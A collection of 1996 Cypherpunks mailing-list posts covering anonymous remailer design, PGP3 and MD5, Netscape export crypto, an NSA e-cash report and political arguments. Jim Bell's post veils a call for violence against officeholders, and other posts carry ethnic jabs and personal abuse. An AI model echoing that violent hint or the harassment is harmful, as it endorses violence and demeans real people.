However I think it is nice to know when there is increased likelihood
of spook interference that the reallocated key gets a fair chance of
being redistributed to a non spook remailer, or according to the
owner's uncoerced wishes.

Also it is nice to know which remailers are run on the same machine,
and/or owned by the same operator, if for no other reason, than to
allow you to take this into account when generating your chains.  I
notice Raph's reliable remailer list includes this information where
it is known:

: Groups of remailers sharing a machine or operator:
: (cyber mix)
: (weasel squirrel)

These remailers are of less value when used together in a chain, in
the case of security compromise on the machine, or operator coercion,
than remailers with different operators.  This kind of information is
valuable just as the remailers other attributes are: the remailers
jurisdiction, and the owner's usage policy.

Matts Kallioniemi <matts@cyberpass.net> reminded us, of a point made
in early rehashes, that we really need disposable last hop remailers.

The interesting point he made, which I had not seen made before, is
that exit remailers could refuse to remail to other remailers, to
discourage use in reply blocks, or at least a tag "exit" could be
added to the Raphs remailer capability list, so that people know that
these remailers are likely to take the heat.

The converse, specifically non-exit remailers, there exists only one
example that I have seen advertised, "middleman". Matts' suggestion of
having all remailers either "exitmen" or "middlemen", seems like a
good idea.

However there are other reasons remailers shut down at short notice,
(other than being attacked by LEs, or having legal threats made).
Amongst these we've seen:

- "sorry folks, I'm taking my laptop on holiday"
- "sorry, remailers keys lost in disk crash, heres a new key"
- "my ISP is shutting down"
- "shut down due to abuse"
- "sorry remailer key compromised"

plus no doubt many temporary outages caused by machine reboots,
network outages, software upgrades, rebooting a linux machine to DOS
to for a while, etc.

It would be really nice if remailers could be made completely
disposable.

Tom Cross <Decius@ninja.techwood.org> described an idea in the
remailer thread on coderpunks.  His idea was to have the remailers in
a DC net, and have pseudonym servers as the DC net nodes.  He also had
redundant secret sharing for the pseudonym <-> reply block database,
to provide resilence to individual DC net nodes bowing out.  This
prevents attacks on the pseudonym server (coercing the pseudonym
server to delete a particular pseudonym and it's reply block), but
doesn't say anything about the resilence of the reply block itself to
remailers in the chain disappearing.

A method relying on DC nets would be for the nym owner to create a
single hop reply block, and secret share this reply block over the DC
net nodes.  If a request is sent to any DC net node, provided that the
required k of n share holders remain, the reply address can be
retrieved.  You would need to ensure that the reconstruction of
recipients address did not reveal shares.

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alexander Chislenko <alexc@firefly.net>
Date: Thu, 24 Oct 1996 13:37:45 -0700 (PDT)
To: cypherpunks@toad.com (Cypherpunks mailing list)
Subject: Work on reputations
Message-ID: <2.2.32.19961024204046.011544c4@pop.agents-inc.com>
MIME-Version: 1.0
Content-Type: text/plain


Could somebody please forward me references to existing reputations-based
systems, and discussions of them? I read cyphernomicon and some texts on
and off the Net, but I assume there should be a lot more.



---------------------------------------------------------------------------
Alexander Chislenko <sasha1@netcom.com>     www.lucifer.com/~sasha/home.html
Firefly Network, Inc.: <alexc@firefly.net>  www.ffly.com  617-234-5452
---------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 24 Oct 1996 17:10:10 -0700 (PDT)
To: mjmiski@execpc.com
Subject: Re: Stopping the buying of candidates
Message-ID: <199610250009.RAA08647@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:40 PM 10/24/96 +0000, Matthew J. Miszewski wrote:
>This is my last reply.  I guess I forgot your overarching theory. 
>Reality, nah.

"My last reply"?  Sorta the rhetorical equivalent of "I think I heard my 
mommy calling," huh?


>(snip)
>> No, I didn't say I was "cutting off all prediction of money appearing."   
>> But it would be a long shot from having particular donor's names associated 
>> with particular dollar figures.  And, the system would simply have to 
>(snip)
>
>It's not a long shot.  When Bob the Big Bad Lobbyist comes into the 
>Senator's office and leads him to believe a donation will be made and 
>magically a sizeable one does, it can be reasonable infered from 
>whence it came. 

Except that "sizeable" donations won't appear.  If you don't understand 
this, you haven't been reading the descriptions of how the system would 
work.  Individual donations won't be identified either by name of amount; 
they'll be accumulated and only approximately reported.

> In the real world, politicians have access to the 
>names and addresses of people who regularly donate to political 
>campaigns. 

I wonder how many people will still be donating if they can't get their name 
associated with the donation...

> Trust me, the probability of others, i.e. regular working 
>people, donating to campaigns is zero to none.  There is a finite 
>pool of political campaign money out there.

And it'll be even less when this system is adopted.


>> I'd prefer doing something far more...uh...permanent than to merely REPLACE 
>> officeholders.
>
>My fault.  I forget whom I was replying to.  Of course my reply above 
>was in response to your question about developing a "working" system. 
>Have fun in your politicianless world (with no physical 
>infrastructure, information infrastructure, national defense, etc.) 

Who needs "national defense"?  As for "information infrastructure, are you 
under the illusion that private industry couldn't do it?  Hell, it DOES it!  
The Internet is essentially fully privatized, NOW.

And "physical infrastructure"?  Sure they'll be physical infrastructure.  
It'll just be _privately_ owned.

>I would much rather leave it to the market.  There is, of course, no 
>corruption there. (WINK) 

The difference between private and public corruption is that in private 
corruption, individuals presumably have the right to fight that corruption 
where it impacts on their rights and assets.  In PUBLIC corruption, the 
taxpayer is rarely given the opportunity to fight the loss of his assets.

>
>> >Every candidate ever endorsed by the Firefighters Union in my town 
>> >have been absolutely elected.  Looking at the firefighters voting 
>> >records and matching with their addresses shows a distinct pattern of 
>> >voting in almost every election. 
>> 
>> "Firefighter's voting records"?  I _thought_ we had a secret ballot in this 
>> country.  Maybe you're from some  town that I don't know about!
>
>I, unlike some people, live in the real world.  It is trivial for 
>political groups to put together listings of public employee 
>addresses, their VOTING records (meaning whether they voted or not, 
>check with your city hall...hmmm...go figure, they keep track of 
>that) and public expressions of support (i.e. lawn signs, letters to 
>the editor, rally attendance).  Compile this info and you have a 
>pretty good handle on who voted for whom (Yes I know it cant show 
>absolutely that someone voted a certain way, but most of campaigning 
>is simple probability.  I dont have the time to explain this in 
>detail, look it up if you are really interested).


It appears that you've convinced yourself that ESP exists and works.  Given 
that, it isn't surprising that you would believe that donations to 
candidates can't be "blinded" sufficiently to help dramatically reduce 
political quid pro quo.


>> Besides, what you're saying can be considered a bit of self-fulfilling 
>> prophecy.  Some cities ALWAYS vote one way, or another.  Over time, public 
>> employees simply adjust their politics to match their wallets, etc.  
>> Remember, these are PUBLIC employees after all, which really just means the 
>> employeees of the thugs who get into office.  It does not serve their 
>> interests to go against the winning candidate.  If, one year, the party 
>> normally out of office appears to be winning, the Firefighters will simply 
>> adjust their politics accordingly.  Simple.
>
>What you are not getting is that, in this case, the public employees 
>are the edge that causes the win.

How do you know this?  

>  We have had some close races, the 
>winning margin is clearly less than the number of voting public 
>employees. 

The winning margin is ALSO clearly less than the number of many different 
identifiable groups.  You seem to be making assumptions in support of your 
theory.

> You don't need to control all the votes.  Only the sure 
>number that you can "deliver", the need for which can be discerned 
>fairly easily (using those nasty historical voting records).

ESP again, I see...


>> > They have sufficient numbers to win every time.
>> 
>> Whichever candidate wins, "has sufficient numbers to win."  Tell me 
>> something else I don't know.
>> 
>
>This came from a discussion of vote delivery.  X has a block Y that 
>will vote for Z (the endorsed candidate) every time.  If victory 
>margin is less than Y, X's delivery controls the race.

Except that plenty of voting blocks exist.  And there's plenty of unknowns 
that you can't figure out with any certainty:  How certain are you that 
"Block Y" ALL voted for Z?  How do you know some other group didn't?  Etc.



>> >Power currupts.  Not size of governement. 
>> 
>> Size of government is evidence of the size of the corruption.
>> 
>
>Unproven.  Apparently you don't believe that some monarchies, which 
>can be extremely small governments, have been some of the most 
>corrupt in history.  As I stated above, power corrupts.  It is an 
>easy way out of arguments for libertarians and most republicans to 
>say that big government is the root of all evil.

It's pretty close, even if not entirely the "root of all evil."

  

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Thu, 24 Oct 1996 17:13:23 -0700 (PDT)
To: Julian Assange <proff@suburbia.net>
Subject: Re: New On WWW.Infowar.Com Vol I #3
In-Reply-To: <199610241857.EAA03695@suburbia.net>
Message-ID: <Pine.SUN.3.91.961024170623.21224C-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Yes. Perhaps it's time to review this book -- and associated advertising 
techniques.

-Declan


On Fri, 25 Oct 1996, Julian Assange wrote:

> > WINN Schwartau's second book on IW, "Information Warfare - Cyberterrorism:
> > Protecting Your Personal Security In the Electronic Age" is a *must* have,
> > inclusive update  on the subject.   You will want this book in your library
> > of Information Warfare AND INFORMATION SECURITY genre.
> > 
> 
> Jesus WINN do WE have TO go THOUGH this BLOODY CAPS thing WITH every
> AGRANDISING product ANNOUCEMENT INTERpact RELEASES?
> 
> -- 
> "Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
>  may be the most  oppressive.  It may be better to live under  robber barons  
>  than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
>  sometimes sleep,  his cupidity may at some point be satiated; but those who  
>  torment us for own good  will torment us  without end,  for they do so with 
>  the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
> +---------------------+--------------------+----------------------------------+
> |Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
> |proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
> |proff@gnu.ai.mit.edu | FAX +61-3-98199066 | C7F81C2AA32D7D4E4D360A2ED2098E0D |
> +---------------------+--------------------+----------------------------------+
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Philip L. Karlton" <karlton@netscape.com>
Date: Thu, 24 Oct 1996 17:45:47 -0700 (PDT)
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: PIS_son
In-Reply-To: <326D5494.334A@netscape.com>
Message-ID: <32700D64.7275@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


The Deviant wrote:
 
> On Tue, 22 Oct 1996, Jeff Weinstein wrote:
> >   John, I think you are misreading the intent here.  By making
> > it easier to develop separate domestic and exportable
> > versions of a product, we foil the government's attempt to
> > force weak domestic encryption because it is too much work to
> > maintain two different versions.

> Intents are arguments used by idealists.  Netscapes screwing us over.

Please explain your position. The engineering community at Netscape is
doing what it can, within the law, to provide strong crypto to our
customers.

PK
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation

    Everything should be made as simple as possible, but not simpler.
	-- Albert Einstein




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 24 Oct 1996 20:42:14 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Merc: PacBell predicts imminent death of the net; film at 11
Message-ID: <Pine.GUL.3.95.961024202749.24299C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Full text freely available at http://www.sjmercury.com/business/dial1023.htm
(they do one or two net-related stories "free" per day)

Pac Bell says Net use may collapse phone system

ISPs rebut dire, 'trumped-up' prediction

Published: Oct. 24, 1996

BY HOWARD BRYANT
Mercury News Staff Writer

As many as one of every six telephone calls in Silicon Valley now
doesn't go through on the first try because Internet denizens are
tying up the lines, Pacific Bell reported Wednesday.

Under normal circumstances, less than 1 percent of calls go
uncompleted, the company said. The situation is so dire that
California's entire phone system is in danger of breakdown, a company
executive said, with Silicon Valley especially on red alert.

[...]

But rather than being a sign of imminent collapse, critics called Pac
Bell's startling statistic a trumped-up charge designed to scare the
public and pressure federal regulators into ending a price break
Internet service providers enjoy when tying into Pac Bell's network.

''The Internet is a baby and Pac Bell has been in this game since
Alexander Graham Bell's bar mitzvah. Now they're saying that in the
last three weeks, we broke the phone system? Come on,'' said the head
of a service provider who asked not to be named for fear of reprisal
by Pac Bell.

[...]

At the heart of the issue is a pricing conflict between Pac Bell and
the ISPs. In 1983, the Federal Communications Commission gave
companies that offered Internet services, and other ''enhanced service
providers,'' an exemption from the per-minute fees that other
companies, such as long-distance telephone companies, pay to use Pac
Bell's network.

[...]

Wiping out the subsidy would force Internet companies to find new,
more efficient ways of pricing that better reflect actual usage,
Parker said.

In all likelihood, Net service prices would increase for consumers.

[...]

''This is clearly a ruse,'' said Dick Severy, director of public
policy for MCI. ''They've added 691,000 access lines
this year. Business lines are up. It's curious.''





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Olaf Kielhorn" <kielhor@ibm.net>
Date: Thu, 24 Oct 1996 11:55:09 -0700 (PDT)
To: "John Young" <jy@jya.com>
Subject: Re: Chinese Gold Bar Mystery
Message-ID: <199610241854.SAA62374@smtp-gw01.ny.us.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 23 Oct 1996 12:28:35 -0400, John Young wrote:

>http://www.iacr.org/~iacr/china/china.html
>
>
>Cryptograms on Gold bars from China
>
>
[snip] rest deleted

this message seems to return like the four season at least 3 times a year 

It get's more and more boring each time.

Every beginning of an idea corresponds to an imperceptible lesion of the mind.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 24 Oct 1996 18:40:24 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: slander and call for lawyers. :)
In-Reply-To: <Pine.SUN.3.91.961024150217.16354F-100000@beast.brainlink.com>
Message-ID: <oDZBwD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Is Ray the genocidal maniac going to be represented by the legal team of
Helena Kobrin and Cantor & Siegal?

I'd nominate my good friend, Dr. John M. Grubor (the founder of Internet),
for Ray's all-star legal team, except that he's been disbarred.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 24 Oct 1996 20:45:02 -0700 (PDT)
To: sunder@brainlink.com (Ray Arachelian)
Subject: Re: slander and call for lawyers. :)
In-Reply-To: <Pine.SUN.3.91.961024150217.16354F-100000@beast.brainlink.com>
Message-ID: <199610250336.WAA04376@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Ray Arachelian wrote:
> 
> On Tue, 22 Oct 1996, Dr.Dimitri Vulis KOTM wrote:
> 
> > Jews, and anyone else non-Armenian. It's somewhat surprising to see such
> > stereotypical "old-country" behavior in an alleged Californian.
> 
> > And I don't see any evidence that Timmy or Ray are "crypto people".
> 
> That's because you're not a crypto person and have no clue as to who 
> are.  I'm not about to sit here and trumpet the things I've done for 
> crypto.  Neither will Tim.

He is a crypto person. Look up his dissertation about collective 
encryption.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 24 Oct 1996 21:20:27 -0700 (PDT)
To: jimbell@pacifier.com (jim bell)
Subject: Re: Stopping the buying of candidates
In-Reply-To: <199610250009.RAA08647@mail.pacifier.com>
Message-ID: <199610250406.XAA04876@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


jim bell wrote:
> I wonder how many people will still be donating if they can't get their name 
> associated with the donation...

I wish I was not associated with my donation... I made only one and am
still flooded with truckloads of political bullshit and solicitations.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 24 Oct 1996 23:24:21 -0700 (PDT)
To: Steve Reid <steve@edmweb.com>
Subject: Re: [DES] Random vs Linear Keysearch.
In-Reply-To: <Pine.BSF.3.91.961024162358.314A-100000@bitbucket.edmweb.com>
Message-ID: <32705CB4.50D8@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Steve Reid wrote:
> > There are methods of protecting against some forms of sabotage:
> > The running XOR of the round 15 output will always ensure that the
> > keyspace has been searched, but requires duplicated work to check,
> > and the half-match method should work well on large blocks; if the
> > half-matches are distributed evenly, there should be a few in each
> > 31 bit chunk.

> Let's consider a worst-case, but entirely possible, scenario:
> The NSA doesn't like what we're doing. They want DES to be seen as strong,
> so they try to disrupt the effort.
> The NSA presumably has a large DES cracking machine. They use this to
> determine the key, then send a message to the servers saying that they've
> searched that space and not found the key. So, because everyone thinks the
> space has already been unsuccessfully searched, that space is avoided and
> the key is never found.
> This not only works for the NSA, but for any organization who can afford
> to brute-force DES and find the key before we do.
> Certainly any organization with a DES cracker wants DES to be considered
> secure. That way, people will continue to use DES and the cracking machine
> will still be of use.

Speaking of the NSA, someone there once said "never underestimate what your enemy is 
willing to do to crack your code" (quote approx.), and you can extrapolate from that 
"never underestimate the power of disinformation".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 24 Oct 1996 23:45:47 -0700 (PDT)
To: Benjamin Grosman <bgrosman@healey.com.au>
Subject: Re: slander again [RANT]
In-Reply-To: <2.2.32.19961025030210.008d2780@healey.com.au>
Message-ID: <327061EE.3059@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Benjamin Grosman wrote:
> Dear Sirs,
> Have either of you read my post to the coderpunks list concerning
> professionalism? I feel that it might be slightly applicable here. Surely
> this has gone on long enough, and in enough of a public manner, that enough
> people are sick of it.

Just a note: If you haven't already seen it, there's a scene in one of the first 
Godfather movies where Al Pacino has to get out of the country (USA), so he goes to 
Sicily to visit.  He's walking through the village with a girl, and he asks the girl 
"where are all the men?" (there are no men to be seen).  And she says "all killed in 
vendettas".

Carl Oglesby wrote a book on the National Security State as a prelude to the 
assassination of John Kennedy and others, and one of the chapters was titled
"Paranoia as a way of knowing".  If I could, I would rename it to "Paranoia as
a way of knowing who we are".  Or as Pogo paraphrased a famous admiral "We have
met the enemy and they are us".

In the latest issue of PC Week, John Dvorak complains bitterly about flaming on the
net gotten out of hand.  Good article, but cypherpunks has a long way to go before
it fits the description in PC Week.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nelson Barus <bwersada@idola.net.id>
Date: Thu, 24 Oct 1996 09:40:27 -0700 (PDT)
To: coderpunks@toad.com
Subject: (no subject)
In-Reply-To: <199610232252.SAA01242@nsa.research.att.com>
Message-ID: <32706275.7432@idola.net.id>
MIME-Version: 1.0
Content-Type: text/plain


unsbscribe cyperpunk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Murray Hayes" <mhayes@infomatch.com>
Date: Fri, 25 Oct 1996 00:26:25 -0700 (PDT)
To: "cypherpunks@toad.com>
Subject: Re: (null)
Message-ID: <199610250726.AAA26732@infomatch.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Oct 1996 10:51:00 +1000, Butler, Anthony wrote:

>22/10/96
>
>WASHINGTON - US First lady Hillary Rodham Clinton unveiled a new
>Superman comic book for Bosnian children during an East Room ceremony
>Monday. The comic book, written in three languages, shows the
>mythical American hero flying down to save two little boys in Bosnia-
          ^^^^^^^^

Ahem, that would be Canadian hero.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 25 Oct 1996 17:55:22 -0700 (PDT)
To: unicorn@schloss.li
Subject: pgp3 (was Re: MD5?)
In-Reply-To: <Pine.SUN.3.94.961022212709.29900D-100000@polaris>
Message-ID: <199610242332.AAA00532@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Black Unicorn <unicorn@schloss.li> writes:
> So...
> 
> Is MD5 essentially history?

Unclear.  The collision Dobertin demonstrated does not provide a
practical attack on PGP signatures.  However, people worry that
Dobertin or others will be able to generalise the attack, so caution,
and moving away from MD5 is probably a good idea.

> Aside from MacPGP 2.6.3, is there a pgp version which will support
> anything else?

Zbig (MacPGP author for those who haven't looked at the fatmac pgp
docs - http://128.146.111.31/~fiedorow/PGP/) also distributes an
unofficial SHA1 patch for PGP, which he says has been tested on
various archictectures.  (This is a patch to MIT pgp262 or MIT
pgp263).  However AFAIK fatmac is the only distributed version with
SHA1 sig capability included.

Ordinarily you'd think that there would be a rush to put out a new
version of PGP (Say PGP versions 2.6.4 and 2.6.4i respectively for MIT
and Stale Schaumaker's interational version).

However, I'm not sure of the status of further pgp2.6.x versions.
PGPlib (aka pgp3) is supposed to be being released RSN.  PGP Inc was
formed earlier this year.  Initially PGP Inc made noises about
litigation over ViaCrypts incorporation of commercial key escrow in
some viacrypt versions.  Then PGP Inc bought ViaCrypt and it's parent
company, to regain the distribution rights sold to ViaCrypt.

The people working on pgp3 are doing so as employees of companies, I'm
not sure at what point development switched from freeware to
commercial, but at this point my understanding is that Derek Atkins is
employed by SGI, and Colin Plumb by PGP Inc.  Some time ago when there
was a question about which companies were crypto friendly on the list,
SGI was listed because they were paying Derek to work on pgp3.  One
presumes this arrangement started before PGP Inc incorporated.

Other people at PGP are also working on pgp3 (Hal Finney, who recently
started work at PGP Inc, said that he was in a recent list post).

I believe Phil Zimmermann made an announcement earlier this year
(probably on this list, but perhaps in a USENET group, I forget), that
his lawyers were advising him to discourage other people from using
the `PGP' name.

MIT is distributing pgp2.6.2, and PGPfone also.  MIT seems to be
involved as a distribution site at least.

Also I understand, though there appears to be no available
documentation saying as much, that pgp3.0 will not use RSA, nor IDEA,
nor MD5, using instead El Gamal for public key encryption and
signatures, 3DES (unsure?), and SHA1.

Several people have made pointed comments about the delivery time of
pgp3, about the danger of S/MIME getting ahead before pgp3 is
released.  Several people have opined that there would surely be many
people willing to help.  I suspect however that the offers of help may
be complicated by the commercial nature of pgp3.

Also in conversation I hear rumors that there are companies at the
moment who have access to beta versions of pgp3.  Is this so?  And if
so, might cypherpunks also be considered?

As I understand it pgp3 will be available in source form, and will be
available without charge for academic and personal use.  People who
pay for PGP will get shrink wrap, manuals and use of PGPs tech support
lines.

However, I am not sure what pgp3 includes...  Derek's most recent post
to the list indicated that it had a command line UI, similar to
pgp2.6.x?

Now I agree code takes time to write, specs take time to tidy up, etc.

But we like to know what's going on... approximately.  What will be in
pgp3?  What's it use for encryption El Gamal, SHA1, what about
symmetric cipher, is it 3DES?

Even mentioning that pgp3 will include source code, and be freely
available is something that is not being advertised?  No mention of
pgp3 on www.pgp.com, mit; a web search reveals nothing.

Cypherpunks crave information about pgp3, any information...

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dh12@dial.pipex.com
Date: Fri, 25 Oct 1996 17:32:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: 'what cypherpunks is about'
Message-ID: <199610260031.BAA13872@typhoon.dial.pipex.net>
MIME-Version: 1.0
Content-Type: text/plain



Tim May should learn that holding 'harsh'
and 'realistic' opinions require a little
substantiation...not ignorence and blind
scepticism.

Rather than start an argument on third world
politics and the like I'll quote two sources
that Tim and everyone else ought to check
out. These are at the end of this post.

Second, ok so cypherpunks is not about the
redistribution of wealth is it?

How many of you would agree it is about
retaining the status quo?

Cypherpunks, in my (rather simplistic)
opinion, IS about the redistribution of
power. Wealth is often seen as a subset
of power.

The people who control assets today are by and
large criminals. This is not a judgement but
a simple statement...in the past the main
form of power was violence - 'Political
power grows from the barrel of a gun.' - Mao

More gained through war, pirecy and pillage
is today seen as liliy white, by the likes
of Tim May. This is ignorence. Look closer.

Cypherpunks & crypto gives us a chance today
to 'redistribute' the power base from one
based on fear, violence etc to one based on
information...wait! I didn't say this new
power base will be more ethical than the
last...who knows? It certainly has the
potential to be...that is what cypherpunks
is about...to me! To Tim May it's about
something very different.

But remember people are NOT sheep and nothing
lasts forever.

Historically, geographic areas such as
the third world are not responsible for
their current economic climate any more
than Tim May is responsible for the economic
sucess of the US, or for that matter the
criminal acts of Nixon...who is then? Read
on MacDuff...

Read 'A Fate Worse Than Debt' - Susan George
for a popular understanding on the third
world debt crisis. This will tell you about
'countless third world deaths' and also the
extent of Citibank's involvement.

A quote:

'If I were the president of a third world
nation...I would be far more frightened
by a well dressed gentleman bringing loans
from the IMF or Citibank than by a bearded
guerrilla muttering threats of revolution.'

- Lewis Lapham, Imperial Masquerade, 1990

For an economic perspective on third world
debt read:

 'Economics for a developing world'
 - Michael P Todaro, ISBN 0-582-07136-4

Zaid Hassan
ph93szh@brunel.ac.uk

ps.sorry if this is rather harsh Tim, you
sorta annoyed me.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Thu, 24 Oct 1996 20:27:08 -0700 (PDT)
To: "Philip L. Karlton" <karlton@netscape.com>
Subject: Re: PIS_son
In-Reply-To: <32700D64.7275@netscape.com>
Message-ID: <Pine.LNX.3.94.961025032404.2033D-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Oct 1996, Philip L. Karlton wrote:

> The Deviant wrote:
>  
> > On Tue, 22 Oct 1996, Jeff Weinstein wrote:
> > >   John, I think you are misreading the intent here.  By making
> > > it easier to develop separate domestic and exportable
> > > versions of a product, we foil the government's attempt to
> > > force weak domestic encryption because it is too much work to
> > > maintain two different versions.
> 
> > Intents are arguments used by idealists.  Netscapes screwing us over.
> 
> Please explain your position. The engineering community at Netscape is
> doing what it can, within the law, to provide strong crypto to our
> customers.
> 
> PK
> --
> Philip L. Karlton			karlton@netscape.com
> Principal Curmudgeon			http://www.netscape.com/people/karlton
> Netscape Communications Corporation
> 
>     Everything should be made as simple as possible, but not simpler.
> 	-- Albert Einstein
> 

As I later said to Jeff, I was tired, i misread something.  I apologize.
thats about you 'screwing us over' (the IBM crapload 'bout GAK)

on the otherhand, if you read carefully, "Civil Disobediance" is within
the law.

 --Deviant
"Whatever you do will be insignificant, but it is very important that
you do it."  --Mahatma Gandhi






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: field@nyc.pipeline.com (Richard L. Field)
Date: Thu, 24 Oct 1996 20:26:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: NSA Report: Anyone seen this?
Message-ID: <199610250325.DAA22372@pipe1.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


  The 18 June 1996 report, "How to Make a Mint:  The Cryptography of
Anonymous Electronic Cash", was written by Laurie Law, Susan Sabett, and
Jerry Solinas of the Office of Information Security Research and
Technology, Cryptology Division, NSA.  It is 30 pages, as follows: 
 
INTRODUCTION 
 
Section 1.  What is Electronic Cash? 
  1.1  Electronic Payment 
  1.2  Security of Electronic Payments 
  1.3  Electronic Cash 
  1.4  Multiple Spending 
 
Section 2.  A Cryptographic Description 
  2.1  Public-Key Cryptographic Tools 
        (One-Way Functions, Key Pairs, Signature and Identification, Secure
Hashing) 
  2.2  A Simplified Electronic Cash Protocol 
  2.3  Untraceable Electronic Payments 
  2.4  A Basic Electronic Cash Protocol 
 
Section 3.  Proposed Off-Line Implementations 
  3.1  Including Identifying Information 
        (Cut and Choose, Zero-Knowledge Proofs) 
  3.2  Authentication and Signature Techniques 
        (RSA Signatures, Blind RSA Signatures, The Schnorr Algorithms, 
         Schnorr identification, Schnorr Signature, Blind Schnorr
Signature, 
         Chaum-Pederson Signature, Implementations of the Schnorr
Protocols) 
  3.3  Summary of Proposed Implementations 
        (Chaum-Fiat-Naor, Brands, Ferguson) 
 
Section 4.  Optional Features of Off-Line Cash 
  4.1  Transferability 
  4.2  Divisibility 
 
Section 5.  Security Issues 
  5.1  Multiple Spending Prevention 
  5.2  Wallet Observers 
  5.3  Security Failures 
        (Types of failures, Consequences of a failure) 
  5.4  Restoring Traceability 
 
CONCLUSION 
 
REFERENCES 
 
 
   - Richard Field 
 
 
 
 
On Oct 24, 1996 09:52:25, 'declan@well.com (Declan McCullagh)' wrote: 
 
>Just got off the phone with the NSA. 
> 
>"There are so many places in the NSA that deal with cryptology 
>we haven't been able to find the document yet. We'll call you 
>back once we locate it and let you know if it can be released 
>or not. We've been getting phone calls about the document. Did 
>you read about it on the Internet?" 
> 
>-Declan 
 
>>______________________________ Forward Header 
 
>>21st Century Banking Alert No. 96-10-17 
>>October 17, 1996 
>> 
>>National Security Agency Report Raises 
>>Systemic Security Issues Related to Anonymous Electronic Money 
>> 
>> 
>>     A recent report prepared by the Cryptology Division of the National 
>>Security Agency's Office of Information Security Research and Technology 
>>discusses the potential for security failures in certain electronic cash 
>>systems and their likely consequences.  While demonstrating concern over
the 
>>attributes of non-traceable electronic money, the report points out
methods 
>>that may be used to minimize security breaches and losses, including 
>>limiting the number of coins that can be affected by a single compromise,

>>requiring traceability for large transactions or large numbers of 
>>transactions in a given period, and the creation of a mechanism to
restore 
>>traceability under certain circumstances.  The report contains an
excellent 
>>summary of basic electronic money cryptographic tools, electronic cash 
>>protocols, authentication and signature techniques and related security 
>>issues. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Thu, 24 Oct 1996 11:58:50 -0700 (PDT)
To: betty@infowar.com (Betty G. O'Hearn)
Subject: Re: New On WWW.Infowar.Com  Vol I  #3
In-Reply-To: <1.5.4.32.19961024153400.00715da4@mail.infowar.com>
Message-ID: <199610241857.EAA03695@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> WINN Schwartau's second book on IW, "Information Warfare - Cyberterrorism:
> Protecting Your Personal Security In the Electronic Age" is a *must* have,
> inclusive update  on the subject.   You will want this book in your library
> of Information Warfare AND INFORMATION SECURITY genre.
> 

Jesus WINN do WE have TO go THOUGH this BLOODY CAPS thing WITH every
AGRANDISING product ANNOUCEMENT INTERpact RELEASES?

-- 
